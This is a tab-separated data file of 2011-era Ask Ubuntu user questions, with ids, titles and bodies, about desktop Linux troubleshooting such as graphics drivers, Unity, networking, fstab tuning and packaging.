78845	is it possible to install older catalyst versions through jockey ?	is it possible to install older catalyst versions through jockey ? there is a 100 % cpu bug for opencl applications in all catalyst versions post 11.4 . i tried installing from ati website using -- build-pkg , but something isnt working , i dont know if its kernel 3 causing issues or what . guess im asking if anyone has rebuilt for 11.10 , or just if there is a repo i can use to test myself ?
78849	ubuntu software center `` check your internet connection ''	i ca n't install anthing from ubuntu software center . when i want to download application , opens an error and it says `` check your internet connection '' . internet connection works in browser , skype and thunderbird .
78854	pidgin not showing up after opening it	i am on ubuntu 11.10 . i have installed pidgin right after installing 11.10 . as far as i remember everything worked great . however , for a while now ( in the mean time i did some video drivers installation ) every time i open pidgin from the system tray , it 's icon appears on the unity launcher , but the window does n't open . i have managed to find only one pattern of steps which opens me the pidgin window : open pidgin from system tray . icon appears on unity launcher right click on the icon , quit . open pidgin again from system tray . icon appears change my workspace to any other press the icon form the pannel i am getting switched back to the original workspace and the pidgin application finally opens . it 's a little frustrating ... .what do you suggest i should try ?
78855	has the ambiance theme been ported to gnome shell ?	has the ambiance theme we were used to see on older versions of ubuntu been ported to gnome shell in ubuntu 11.10 ? does it come included when one installs the gnome-shell package ?
78856	referencing environment variables *in* /etc/environment ?	i recently discovered /etc/environment , which seems a more standard way to setup simple environment variables than scripts , but i was wondering if there was a way to back-reference environment variables in the /etc/environment file . that is , i have this : java_home= '' /tools/java '' grails_home= '' /tools/grails '' groovy_home= '' /tools/groovy '' gradle_home= '' /tools/gradle '' path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games '' if i try to add $ java_home/bin to the path definition , however , i get $ java_home/bin , and not the interpolated variable . to remedy this , i 'm creating environment.sh in profile.d to add the /bin entries to the path , but this seems sloppy and disorganized . is there a way to backreference the environment variables in /etc/environment ?
78858	cisco vpn stopped working	i 'm using the cisco vpn anyconnect client to connect my home computer to work . when i use my personal router it works fine , but when i use the free wifi that comes with my apartment it stops working . this happens on both my desktop ( 11.10 ) and netbook ( netbook remix ) . does anyone know why ? edit : i 'm not sure what information is useful here ( dmesg does n't seem to display anything useful ) but here 's a session : ~ > ping google.com ping : unknown host google.com ~ > dhclient rtnetlink answers : operation not permitted
78860	loss of privileges when enabeling auto log-in to encrypted home folder	i use ubuntu 11.10 with gnome shell and have an encrypted home folder . i enabled auto log-in through the system settings/users-admin menu , as i expected it did n't work ( because of my encrypted home folder/user i suspect ) . but now i do n't have privileges to mount my eksternal hard-drive , and i can no longer disable the auto log-in function , since the un-lock button in users-admin menu is grayed out . it seems like my users privileges has been degraded . does any one have an solution to how i disable auto log-in and regain my privileges ?
78861	how can i enable a face browser in lightdm ?	is there a way to enable face display in the default lightdm greeter in oneiric ? if not , is there another alternative greeter that supports faces ? ( i know i can switch back to gdm if necessary , but i assume somebody must have this working with lightdm ... )
78862	unity panel was glassy and transparant and has a solid black background now	10 64 bit on a dell laptop that has 6gb ram and 1gb graphic card . all of a sudden there were some sudden changes in ui which i am unable to understand why . the unity panel was initially glassy and transparent , now it looks all black in its background . likewise the alt+tab graphics was working well until it got changed suddenly and now shows icons on pure white background . i 've not tried to install any themes and i 've not tried to tweak anything . why did this ui changes occur ? could it be that it is unable to detect the graphic card or something ? how can i fix this and how can i get back the original desktop back ? please help..
78863	i 'm missing old alt-f2 in unity	i 'm missing the good old alt-f2 in unity . is there a way to add this feature to unity ? are they some programs that work reasonably similar to alt-f2 in the older gnome ?
78865	no audio and microphone working on asus 1101eeepc	i have just installed the latest distribution of ubuntu ( 11.10 ) , in my asus netbook and -what a pitty- built in microphone is not working on skype and also the speaker sound is worse . seems something is wrong with the installed drivers .
78869	graphics cards so i can have 4 monitors	i currently have a single old graphics card to which i have connected 2 monitors giving me a big desktop of 2560x1024 . if i get 2 of the following graphics card : http : //www.ebuyer.com/238428-gigabyte-gts-450-1gb-gddr5-dual-dvi-mini-hdmi-out-pci-e-graphics-gv-n450-1gi will i be able to connect 2 monitors per graphics card , giving me a total resolution of 5120x1024 ? i guess what i 'm asking is , will i simply be able to stick both graphics cards in , plug the monitors in and will it all just work out of the box ? i currently have 4 dvi monitors which have a native resolution of 1280x1024 each .
78873	how do i shutdown oracle automatically every friday at 10pm ?	you install oracle database but need to shutdown at night every friday at 10pm so that you can make backups . how would you achieve this automatically using the crontab utility ? assume that the script that shutdown and backups the database in called backup.sh and located in /opt/scripts
78875	was omap3 support dropped for 12.04 ?	the omap3 images was deleted from the cdimages yesterday . was it dropped or is the omap4 identical to them ?
78876	how to set-up my own cloud server ?	i am a student , 17 years of age and wanting to access all of my files at greatest ease . i would like to have a system like this : computer a , b and c are the computers on which i work and to which the files should be available . server a is located in my room and i can install ubuntu on it . what is the goal ? i want to edit files on computer a ( e.g . ) and computer a should update the file on my server , afterwards the server should update the files on computer b and c. ( the same goes for editing files on computer b , afterwards the server has to update the files on a and c. ) i do n't want to have a restriction of disk space , as i already have my own server , so things like dropbox wo n't work for me . how am i able to set-up a network like this ? it is about music , movies , pictures , documents ...
78881	dell inspiron 9400 sd card reader not working	i 'm new in linux , just installed ubuntu 11.10 in a dell inspiron 9400 , everything works fine with the exception of the sd card reader , everytime i insert a card the computer does n't do anything , its like the sd card reader is not there . i did a lspci and it shows the next drivers 03:01.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller 03:01.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 03:01.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) 03:01.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 05 ) everytime i insert a memory card , dmesg shows the next d status 0x600b00 [ 2687.227351 ] end_request : i/o error , dev mmcblk0 , sector 64 [ 2687.229436 ] mmcblk0 : error -110 sending read/write command , response 0x0 , card status 0x600b00 [ 2687.229440 ] end_request : i/o error , dev mmcblk0 , sector 65 [ 2687.230512 ] mmcblk0 : error -110 sending read/write command , response 0x0 , card status 0x600b00 [ 2687.230515 ] end_request : i/o error , dev mmcblk0 , sector 66 [ 2687.231588 ] mmcblk0 : error -110 sending read/write command , response 0x0 , card status 0x600b00 [ 2687.231592 ] end_request : i/o error , dev mmcblk0 , sector 67 [ 2687.232674 ] mmcblk0 : error -110 sending read/write command , response 0x0 , card status 0x600b00 [ 2687.232678 ] end_request : i/o error , dev mmcblk0 , sector 68 [ 2687.234763 ] mmcblk0 : error -110 sending read/write command , response 0x0 , card status 0x600b00 [ 2687.234766 ] end_request : i/o error , dev mmcblk0 , sector 69 [ 2687.236864 ] mmcblk0 : error -110 sending read/write command , response 0x0 , card status 0x600b00 [ 2687.236868 ] end_request : i/o error , dev mmcblk0 , sector 70 [ 2687.238942 ] mmcblk0 : error -110 sending read/write command , response 0x0 , card status 0x600b00 [ 2687.238946 ] end_request : i/o error , dev mmcblk0 , sector 71 [ 2687.238949 ] buffer i/o error on device mmcblk0 , logical block 8 [ 2687.241028 ] mmcblk0 : retrying using single block read [ 2687.243104 ] mmcblk0 : error -110 sending read/write command , response 0x0 , card status 0x600b00 [ 2687.243108 ] end_request : i/o error , dev mmcblk0 , sector 64 [ 2687.245212 ] mmcblk0 : error -110 sending read/write command , response 0x0 , card status 0x600b00 [ 2687.245215 ] end_request : i/o error , dev mmcblk0 , sector 65 [ 2687.247298 ] mmcblk0 : error -110 sending read/write command , response 0x0 , card status 0x600b00 [ 2687.247302 ] end_request : i/o error , dev mmcblk0 , sector 66 [ 2687.248389 ] mmcblk0 : error -110 sending read/write command , response 0x0 , card status 0x600b00 [ 2687.248393 ] end_request : i/o error , dev mmcblk0 , sector 67 [ 2687.250476 ] mmcblk0 : error -110 sending read/write command , response 0x0 , card status 0x600b00 [ 2687.250480 ] end_request : i/o error , dev mmcblk0 , sector 68 [ 2687.252617 ] mmcblk0 : error -110 sending read/write command , response 0x0 , card status 0x600b00 [ 2687.252621 ] end_request : i/o error , dev mmcblk0 , sector 69 [ 2687.254737 ] mmcblk0 : error -110 sending read/write command , response 0x0 , card status 0x600b00 and more of the same but with different sector number i 'm using kernel 3.0.0-12-generic by the way , when i was installing it and ubuntu asks about installation ( if i want to install it along with windows or delete something or change the partitions of the hdd ) if i go to the window to change the partition of the disc , linux detects the sd card ( if there 's one inserted course ) . any help with this it would be appreciated -sorry for my english thank you
78888	how to change the mouse pointer theme	how can i change mouse pointer theme in ubuntu 11.10 , as in previous versions of ubuntu ?
78891	keeping installed packages across dist upgrade	ever since ubuntu provides 'upgrade ' installation path ( since 10.04 if i 'm not mistaken ) , i took it and hoping that my installed packaged will be kept intact or automatically upgraded . but apparently that 's not what was happen . all my installed apps are wiped out and i have to install everything from beginning . easy for ubuntu or partner provided packages but quite a pain for 3rd party packages . was i missing a step during the installation procedure ? or is there another way to keep my installed packages across dist upgrades ? thanks .
78896	acer emachines e725 black screen	when i try to run system ( ubuntu 11.10 ) from pendrive on my laptop ( acer emachines e725 ) system starts but i do n't see anything ( graphic - intel corporation mobile 4 series chipset integrated graphics controller ) . only black screen . who can help me ? .. : /
78897	how to translate software description in software-center	i want to ask you how / where to translate software description shown in ubuntu software center . thank you .
78898	is there a screensaver which uses the webcam ?	the title pretty much says it all : is there a screensaver for ubuntu ( 11.10 ) which makes use of the webcam ? i do n't mean does surveillance , or motion detectors , etc . i mean incorporates the webcam images into the screen saver ?
78899	what is the actual package name for the appearance app ?	i am trying to find the actual package name for the appearance app in ubuntu 11.10 , went through synaptic and cant
78900	unity interface missing	i currently have gnome shell , unity , and unity 2d ( or ubuntu and ubuntu 2d , as they are now called ) on ubuntu 11.10 . gnome shell and unity 2d are working fine , but when log in with the standard unity interface , i am completely missing the launcher and dash . my graphics card information is : 00:02.0 vga compatible controller : intel corporation 82915g/gv/910gl integrated graphics controller ( rev 04 ) the output of the command /usr/lib/nux/unity_support_test -p is : opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) 915g x86/mmx/sse2 opengl version string : 1.4 mesa 7.11 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes
78902	can not run native ubuntu in virtualbox with a vmdk created using the createrawvmdk command with partitions specified	i have a win7 x64 & ubuntu 11.10 x64 dual boot set-up on a single hdd . i wanted to run the native ubuntu as a guest os inside virtual-box running on win7 host . i used the following command to list the partitions : c : \ > vboxmanage internalcommands listpartitions -rawdisk \\.\physicaldrive0 number type startchs endchs size ( mib ) start ( sect ) 1 0x07 0 /32 /33 153 /27 /2 1200 2048 2 0x07 153 /27 /3 1023/254/63 363337 2459648 5 0x82 1023/254/63 1023/254/63 9537 746575872 6 0x83 1023/254/63 1023/254/63 46430 766107783 7 0x83 1023/254/63 1023/254/63 46431 861200384 4 0x07 1023/254/63 1023/254/63 10000 956291072 then i created the vmdk file as follows ( specifying the ubuntu partitions 5,6 & 7 ) : c : > vboxmanage internalcommands createrawvmdk -filename `` c : \ubuntu_01.vmdk '' -rawdisk \.\physicaldrive0 -partitions 5,6,7 the vmdk file was created successfully , but when i created a vm and specified this virtual drive , the vm wont start , theres just a blank black screen with a white cursor at the top left corner . it doesnot even show up the grub boot menu . then i created another vmdk file without specifying the partitions . c : > vboxmanage internalcommands createrawvmdk -filename `` c : \ubuntu_02.vmdk '' -rawdisk \.\physicaldrive0 this time the vm starts and ubuntu boots successfully from inside the vm ( the grub 2 boot menu is presented and on selecting ubuntu , it boots successfully ) . how can i use only the specific native ubuntu partitions instead of the entire disk for the guest ubuntu os in virtualbox ? please help . host : win 7 x64 guest : ubuntu 11.10 x64 vbox version : 4.1.6 r74713 with latest guest additions installed .
78906	ati/amd proprietary fglrx graphics install fails , how can i resolve the problem ?	i want to activate ati/amd proprietary fglrx graphics driver ( post-release update ) , but there is a problem during installation . it says : sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log how can i install this driver ?
78907	how can i hibernate/suspend from the command line and do so at a specific time and a relative time ?	ok , i managed to find out how to suspend/hibernate the system from the command line by reading how can i suspend/hibernate from command line ? . however , i would like to know how to use the command line to suspend/hibernate at a given time , in absolute ( example , 11pm ) or relative ( example , in 30 minutes ) terms . i already know how to do this with shutdown , but i 'm note sure if the command is similar . thanks beforehand .
78910	logitech c310 audio problems	i just installed a logitech c310 webcam , on my onieric system , and i have a problem with it 's audio . when recording sound from the webcam 's source , the resuult is played very fast , in a very high pitch . i believe it has something to do with pulseaudio , since when i tried recording directly from alsa ( by using audacity ) , the result was fine . edit : i checked it further , and the problem occurs only after i switch between different users . edit : i 've also found a similar bug reported on fedora .
78912	how to read bzr diff	original : if __name__ == `` __main__ '' : myparams = { `` server '' : '' mpilgrim '' , \ `` database '' : '' master '' , \ `` uid '' : '' sa '' , \ `` pwd '' : '' secret '' \ } cutting of bzr diff : if __name__ == `` __main__ '' : myparams = { `` server '' : '' mpilgrim '' , \ @ @ -15,4 +22,6 @ @ `` pwd '' : '' secret '' \ } what means the ' @ @ -15,4 +22,6 @ @ ' part of bzr diff and why does it overwrite two lines ? `` database '' : '' master '' , \ '' uid '' : '' sa '' , \
78917	sync folder with android device	i would like to have a folder with all my music which is automatically synced on my android device ( wifi only , plugged in only , like in sugarsync ) . is there any hope for this feature to be implemented in the near future . this would actually make me pay for u1 .
78924	is it possible to share a folder using ubuntu one outside the home folder ?	as the title suggests , i ca n't figure out a way to share a folder outside my home folder using ubuntu one . when browsing to my work partition using nautilus , every folder has the `` share '' option grayed out .
78926	how to start applications such as xcompmgr at start up ?	i 've been trying to make xcompmgrto autostart in lubuntu 11.10 but it just does n't , i have to start it manually . i have added the next lines to the autostart script in ~/.config/openbox/ # run a composite manager xcompmgr & but whenever i log in it does n't do anything , i do n't really need any special parameters for it i just want it to start at log in . how can i make it run automatically at login ?
78931	hibernating even though i plugged in the power cord	i have this problem where if my battery runs low ubuntu shows a dialog warning me the computer will soon hibernate , and if i close the lid and then plug it and open the lid to resume my work , ubuntu will wake up but then hibernate again , even though the laptop is now plugged . is there a setting to prevent this ?
78936	how to enable vdpau on gstreamer ?	i 'm currently experiencing a bit of lag on 720 hd videos . i am hoping vdpau will help . how do i enable it on either gstreamer-based video players ?
78937	very tiny scroll bar in gnome shell	i have recently upgraded to ubuntu 11.10 with gnome shell . everything is okay except the scroll bar , especially in firefox . it 's very , very tiny , especially in long pages ! also , i do n't know why there is a very small gap between scroll bar and border of screen so i ca n't click on scroll bar without seeing it . screenshot :
78939	how do i get a usb gi1515 modem working ?	brand new to ubuntu . trying to install a gi1515 usb modem . where can i find the driver package please ? i 'm running ubuntu 10.04 on an old eeepc 701 4g with 512mb ram .
78940	how do i check if my nvidia gpu supports vdpau ?	mplayer does not work if i try to make it use vdpau . how do i check if my card supports it and what else do i need to install to enable it ?
78941	how to use auto login in a remastered livecd ?	i have been creating a custom live cd of ubuntu 11.10 using remastersys , everything goes well except that the live session asks for a login . the login is automatically set as `` custom '' and the password is blank . this is fine , but i would rather it went direct to the desktop in a live session as you would expect from other distro live cds . i have asked on the remastersys forums , the question has gotten a lot of views , but no answer as of yet , i am wondering has anyone here remastered a distro and come across the login problem , and if so , how did you fix it ?
78950	can anyone confirm if the samsung rc520 touchpad is correctly recognised in 11.10 ?	in 11.04 the touchpad is recognised as a ps/2 logitech wheel mouse - checking around the various touchpad debug pages suggests that the kernal in 11.04 does not register it as a touchpad . can anyone confirm that this issue is resolved in 11.10 ?
78951	how do i remove a malformed line from my sources.list ?	i have unistalled and reinstalled the ubuntu software center as per info i found in a similar thread and i got the same response about line 91 or something like that . i just tried to upload a screen shot but since i 'm new it wo n't allow me to . i also can not figure out how to cut and paste anything so i have to hand type what the error screen says , both when i attempt to open the software center and nothing happens , when i try to enter commands into the terminal to uninstall , reinstall , whatever i get the same following : could not intitialize the package information an unresolvable problem occured while initializing the package information please report t : his bug against the 'update-manager ' package and include the following error message : 'e : malformed line 91 in source list/etc/apt/sources.list ( dist parse ) e : the list of sources could not be read. , e : the package list of status file could not be parsed or opened . how do i report bugs ? what can be done about this . i have searched and everything everyone says to do leads me back to the same line error message . so , i do n't know how to get to line 91 in the source list ; to tell you what it says . sorry , i 'm really new to this . that is what i need is to find out how to get there and fix what it says . i would really like to not have to re partition my hard drive and start from scratch , so i 'm really looking forward to getting this problem solved . i need to be able to install new software .
78955	keyboard shortcut to switch user accounts	i want to quickly switch user accounts with a shortcut combination , something similar how a session can be ended by ctrl + alt + del or locking the screen by ctrl + alt + l ? ( i 'm using unity , 11.10 )
78958	is there a difference between free software and open source software ?	well i am a bit confused with the two terms , are there differences between them ?
78966	atheros ar242x wireless on an acer aspire xg8 not working after upgrading to 11.10	netbook : acer aspire zg8 os : 11.10 previous os : 11.04 wireless : atheros ar242x / ar542x driver : ath5k problem : wireless networking worked fine until upgrading to 11.10 . since upgrading i can not even turn on the wireless card with the physical switch . wireless works fine when booting into windows xp . driver is loaded as shows in lsmod and nm-tool . however , driver state shows unavailable in nm-tool . this could be because the card is turned off , but since i can not turn the card on it 's a catch 22 . also , just for fun i did a clean re-install of 11.10 after upgrading . so , to summarize : worked fine with 11.04 , continues to work fine in windows xp , does not work since upgrade to 11.10 .
78971	best /etc/fstab setings for boosting ssd/hdd	i know ext4 is the fastest by 3y already checking test blog posts from different authors but theres also other settings that make ssd faster i found in http : //www.howtogeek.com/62761/how-to-tweak-your-ssd-in-ubuntu-for-better-performance/ sudo gedit /etc/fstab add to / partition < options > noatime , nodiratime , and also if kernel is > 2.6.33 also add discard , tmpfs /tmp tmpfs defaults , noatime , mode=1777 0 0 and https : //wiki.ubuntu.com/magicfab/ssdchecklist sudo gedit /etc/fstab add to / partition < options > noatime , and thats it and data=writeback mounting option if you formatted the disk without journaling . otherwise add data=ordered which sould be a good compromise between full journaling and none at all . tmpfs /tmp tmpfs nodev , nosuid , noexec , mode=1777 0 0 why only noatime ? and how to know if disk is without journaling from installation ? and whats faster ? no jornaling or opposite ? and diff no journaling data=writeback or journaled data=ordered ? and why tmpfs /tmp differs in both arcticles and how they dffer and witch is better and why ? all of this is about ssd but can i use same settings in hdd ? i want to find answer for hdd and ssd as ive made one time scripts for setting it up in my https : //wiki.ubuntu.com/kangarooo/aftercleaninstallation
78975	how to enable next/previous buttons in ristretto image viewer ?	when i open a picture ( in the default xubuntu image viewer which is ristretto ) i expect to be able to navigate through all the other pictures in the directory pressing back/forward . but this does n't work in ristretto . i 've set `` open entire folder on startup '' in the settings but nothing changed . i can remember that in the past selecting all the pictures in the directory instead of one to open could do the trick , but now there is no difference - back/forward buttons are always disabled .
78976	broken launcher icon for flightgear	i 'm using flightgear and the icon is n't shows properly on ubuntu 11.10 and the icon for the launcher is broken . how do i fix that ?
78978	reboot failure after upgrade from ubuntu 8.04 lts to 10.04 lts	i bought our computer from freegeeks with ubuntu 8.04 installed . i upgraded from ubuntu 8.04 to 10.04 on thursday november 10 . i have an asus p4p800se with intel p4 @ 3ghz . installation messages were : - error loading nautilus config info - replaced customized /etc/login.defs - replaced customized /etc/dhcp3/dhclient.conf - 189 packages removed warning : failed to read mirror file when i rebooted : the usual asus screen appeared , then `` loading grub '' then `` starting up ... '' then `` starting up ... '' again then a blank screen ( the monitor went dormant ) . i rebooted , started grub and selected : kernel 2.6.32-35 generic i got the same results . i rebooted , started grub and selected : kernel 2.6.24-29 generic here 's what was displayed : udevd [ 875 ] : error getting socket : invalid argument libudev : udev_monitor_new_from_netlink : error getting socket : invalid argument segmentation fault gave up waiting for root device common problems - boot args ( cat/proc/cmdline ) - check root delay - check root - missing modules alert ! /dev/disk/by_vvid/c59c6361 etc ... does not exist . dropping to a shell . then busybox v1.13.3 started with the following prompt : ( initramfs ) _ but my keyboard was locked . it appears the hard drive can not be found . any suggestion on how to remedy this ? thank you . thank you all for your responses . i was hoping for a more elegant solution than a clean install . i 'd prefer not to re-install all the software i 've installed over the past 18 months .
78979	battery indicator missing	duplicate of : no battery status icon i have just recently upgraded from 11.04 `` natty narwhal '' to 11.10 `` oneiric ocelot '' on my laptop , but do not have any battery indicator ( which should be located between the volume and date indicator in unity ) . i have already run sudo apt-get install indicator-power and got the following output : reading package lists ... done building dependency tree reading state information ... done indicator-power is already the newest version . indicator-power set to manually installed . the following packages were automatically installed and are no longer required : //list of packages use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . in addition , i have already tried reinstalling , but still do n't have a battery indicator . what else can i do ?
78980	display resolution in duplicate monitor	i use duplicate one monitor laptop lcd and other monitor that monitor resolution is bigger than laptop lcd . how can i set laptop lcd resolution for them ? when i use the mirror button it sets 1024 * 768 but my laptop lcd resolution is 1366 * 768 -- how can i set this resolution for them ? when i set this resolution i get an error . my laptop is an hp dv6 6080 and vga is intel sandy bridge if i change to amd vga can i resolve this problem ? this is the xrandr output -q output . how can i put laptop resolution for two lcd that full monitors screen ? xrandr -q screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 193mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected ( normal left inverted right x axis y axis ) 1920x1080 60.0 + 1600x1200 60.0 1680x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1280x800 59.8 1024x768 60.0 800x600 60.3 56.2 640x480 60.0 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis )
78991	kernel patch that solves battery issues when for ubuntu ?	http : //www.phoronix.com/scan.php ? page=news_item & px=mtaxndm when will this come for ubuntu ? i am getting tired with my 11.10 dieing at little over 50 minutes of battery when at the most extreme powersaving plan .
78995	how to get rid of the multiple top bars in gnome classic	since upgrating to ubuntu 11.10 i 've been trying to get back to the look and feel of gnome2 . the closest i came is gnome classic , but i 'm getting multiple ( 8 ) top bars . normally i would right click and delete these bars , but now it 's not possible to right click on them . any idea ? thanks !
78997	how to make and restore incremental snapshots of hard disk	i use virtual box a lot for distro / applications testing purposes . one of the features i simply love about it is virtual machines snapshots , its saves a state of a virtual machine and is able to restore it to its former glory if something you did went wrong without any problems and without consuming your all hard disk space . on my live systems i know how to create a 1:1 image of the file system but all the solutions i'v known will create a new image of the complete file system . are there any programs / file systems that are capable of taking a snapshot of a current file system , save it on another location but instead of making a complete new image it creates incremental backups ? to easy describe what i want , it should be as dd images of a file system , but instead of only a full backup it would also create incremental . i am not looking for clonezilla , etc . it should run within the system itself with no ( or almost none ) intervention from the user , but contain all the data of the file systems . i am also not looking for a duplicity backup your all system excluding some folders script + dd to save your mbr . i can do that myself , looking for extra finesse . i 'm looking for something i can do before doing massive changes to a system and then if something when wrong or i burned my hard disk after spilling coffee on it i can just boot from a livecd and restore a working snapshot to a hard disk . it does not need to be daily , it does n't even need a schedule . just run once in a while and let it its job and preferably raw based not file copy based .
78999	change the shortcut to move windows from alt to super/meta in unity-2d	there is already an answered question about this but it 's only for regular unity . i 've looked through several entries in dconf-editor and ca n't find anything that could be related . also installed the unity-2d configuration tool from mariano chavero but it does n't have that option . gnome tweak tool also does n't have that option . how can i accomplish the same thing in unity-2d ?
79000	what is the equivalent terminal command to ipconfig /all ?	in windows i can use ipconfig /all and this displays all the info about my connection . in terminal using ifconfig does not and only supplies limited info . i can use network manager , but it would be useful to know the command line alternative . so my question is : what is the command line to supply ip address , gateway , subnet mask , dns the same way ipconfig /all supplies in windows . thanks all
79004	.xprofile is n't enough	i 've been trying to find a solution on how to change the screen resolution on the login screen and other users . .xprofile will only affect my account . i 've been searching for a few months but i got nothing . please help . it would be easier if the `` default resolution '' was still there in the monitors settings . plus , i 'm afraid of editing the xorg.conf . last time was ugly ... my specs : hp dc5000 small form factor ubuntu 11.10 oneiric ocelot i386 intel pentium 4 2.40 ghz intel 82865g x86/mmx/sse2 integrated graphics ( standard experience , opengl 1.3 and runs unity 3d : p ) soundmax integrated audio card broadcomm integrated ethernet 994.1 mib ram 38.3 gb hdd acer x203h ( maximum resolution 1600x900 )
79009	ipod scrobbling to last.fm ?	the amarok 1.4 series scrobbled the songs i played via ipod ( and also had great ipod song transfer functionality ) . i 've not been able to scrobble songs played via my ipod then synced to a media player since my upgrade to 11.10 ( and the subsequent total loss of amarok 1.4 ) . i see various media players ( clementine , banshee ) have requests in for this feature but i 'd like to believe that something , somewhere has ipod scrobbling in ubuntu ! was the 1.4 series of amarok the only thing that had it ? good music management is one of the main reasons i 've used linux ( besides stability , clean interfaces , ease of development , etc ) . the lack of ipod scrobbling to last.fm makes me a very sad panda .
79010	how can i force the nautilus sidebar text color to stay white in my ambiance modification ?	this is related to how can i change the color of the pane separator for my ambiance theme modification ? , which has just been solved . now i have a new issue . as shown below , the text color for the sidebar does not want to stay white unless it is selected . it did earlier , but now it 's not and i 'm not sure why . how can i force that text to stay white in the theme files ? ( see the linked question above for a reference as to what changes i made ; everything else is the same as regular ambiance . ) note : it 'd be great if the white used for the sidebar text color was the same as the default white used for the active window titlebar text ; # ffffff might be a little too bright , and i 'm trying to stay close to the original look of ambiance .
79012	how can i install a complete arabic font ?	i have installed arabic language support using the language tool , but i am still unable to get this page to render correctly : http : //www.iamcal.com/understanding-bidirectional-text/ which fonts do i need to install to stop seeing squares instead of arabic characters ? i would prefer fonts that are available in the ubuntu repositories .
79014	ubuntu software center : add option to launch application after installation	does any body know why ubuntu software center can not launch applications after installation ? all user install application only for one purpose - launch it and use . why we need to install it and after that search it in number of menus . even packages are mixed with applications that why not just allow to launch only applications that put smth in menu . example of such convenient application center - android market , ... . ubuntu 11.10 have pretty/sexy center but ... . vital function still missed .
79015	radeon hd 6870 compatibility with ubuntu 11.10	does anyone have experience with the xfx radeon hd 6870 on ubuntu 11.10 ? i 've googled and the best i could find was someone getting the card to 'work ' on linux . nothing specific about ubuntu and this card . specifically , i want to be able to use the full 1900x1200 resolution and watch 1080p movies . if yes , was it very complicated to get working ? or has someone used this card with an older version of ubuntu ? note : i do not have the card yet , i am debating buying it , but would like to know beforehand because there is a restocking fee if i have to return it .
79018	remove wacom from my system	i purged the `` xserver-xorg-input-wacom '' package , yet the wacom entries still appear in gnome-control-panel and my system menus . how can i get rid of them ?
79019	import images from camera in kde with particular directory structure	i have been using f-spot for a few years to manage my photo archive , which is about 50k images at the moment . with the development of f-spot slowing down in the recent years and me switching to kde , i 'm looking at using digikam , which seems to be very nice and packed with features beyond my wildest hopes : ) one thing i 'm missing though is the way f-spot was importing the images : it was creating subdirectories based on the image 's shooting date : $ home/photos/2011/11/12/img_1234.jpg $ home/photos/2011/11/13/img_1235.jpg $ home/photos/2011/11/13/img_1236.jpg i do n't seem to be able to find a way to make digikam to behave like this - although it has some settings to change the image filename according to some mask which may include shooting date , i see no way to tell it to create sub-directories . ( update - as user26687 pointed out , there is a way to create subdirectories like photos/2011-11-13 , but still i can find no way to create separate subdirectories for year , month and day ) is there a way to make digikam to behave like this ? or , alternatively , what is a good program to import images from a camera and save them on disk in subdirectories according to their shooting date ?
79021	having trouble setting up synergy ( via quicksynergy ) on my ubuntu & lubuntu 11.10 machines	synergy is an app that allows two or more computers to share a keyboard and mouse . i have both synergy and quicksynergy ( the gui for synergy ) installed from the repositories on two computers . one , my `` main '' box , is running ubuntu 11.10 . sitting above it on a shelf is an older laptop running lubuntu 11.10 . i have watched a couple of youtube videos which attept to walk one through the setup process but so far i have not found one that can help me . i have the required applications installed on both machines and they are connected via my wireless router . i need to know exactly what to input ( and where ) on each machine in order to sync my mouse , keyboard , and clipboard between the two .
79024	network does not come back after a unclean shutdown ( poweroutage ) /var/run/network/ifstate not reset	i 've had unstable power lately and both times my network did not restart correctly . i have tracked it down to /var/run/network/ifstate still having my interface as up when really it was down on boot . i 'm using a bridge as my only interface with an ip ( other than lo ) . is /var/run/network/ifstate supposed to be erased/blanked on boot ? can someone tell me which script is responsible for this ? why is lo coming up correctly but not br0 ?
79033	how to switch from gui to console mode	i installed ubuntu 11.10 livecd . how can i switch from gui mode to console mode ? p.s . i want my system started in console mode by default !
79035	what php editor is good for development ?	i installed the ubuntu . can anyone suggest the good php editor for me , also have check in and check out function is better ? thank you !
79043	disable usb mass storage	i want to disable usb mass storage on ubuntu desktop 10.04 , 11.04 and 11.10 . as security policy to avoid data leakage . but in case of emergency there easy way getting usb mass storage back .
79044	display problem with vizio hdtv	i just installed ubuntu in my 4 year old machine and i 'm having a display problem with my vizio hdtv , it seems the screen is offset since the right/lower corner of the unity desktop is not aligned with the lower right corner of the display . i have to go with the mouse outside to the left of the screen in order to activate the left panel menu buttons . i used to be able to use this vizio flat screen hdtv with windows with this same computer . can anyone point me in the right direction to troubleshoot this ? thanks .
79046	how to repackage an app that is open-source ( warzone 2100 ) and put on software centre	i have been playing warzone and noted that the version up on the software center is not up to date , so i have downloaded and installed the newer version . but let 's say i wanted to update the one on ubuntu software center . how would i go about doing this . note : i do not own warzone 2100
79049	does evince support javascript in pdf files ?	in some pdf file readers for ms windows such as those from adobe or foxit , it is possible to turn off the ability to implement javascript in a pdf file . is that possible with evince ( document viewer ) 3.2.1 ? i do n't see any option to do so . or , is it that evince does not implement javascript in pdf files at all ?
79051	unable to setup dpkg build environment	i 'm trying to put the following package into launchpad , but i ca n't really get it work with dpkg-buildpackage even on my system : dpkg-source -b xfce-appmenu-plugin subroutine dpkg : :source : :archive : :getcwd redefined at /usr/share/perl/5.12/exporter.pm line 64. at /usr/share/perl5/dpkg/source/archive.pm line 32 dpkg-source : error : ca n't build with source format '3.0 ( quilt ) ' : no orig.tar file found dpkg-buildpackage : error : dpkg-source -b xfce-appmenu-plugin gave error exit status 255 what problem could it be , i do n't really have to tar this folder right ?
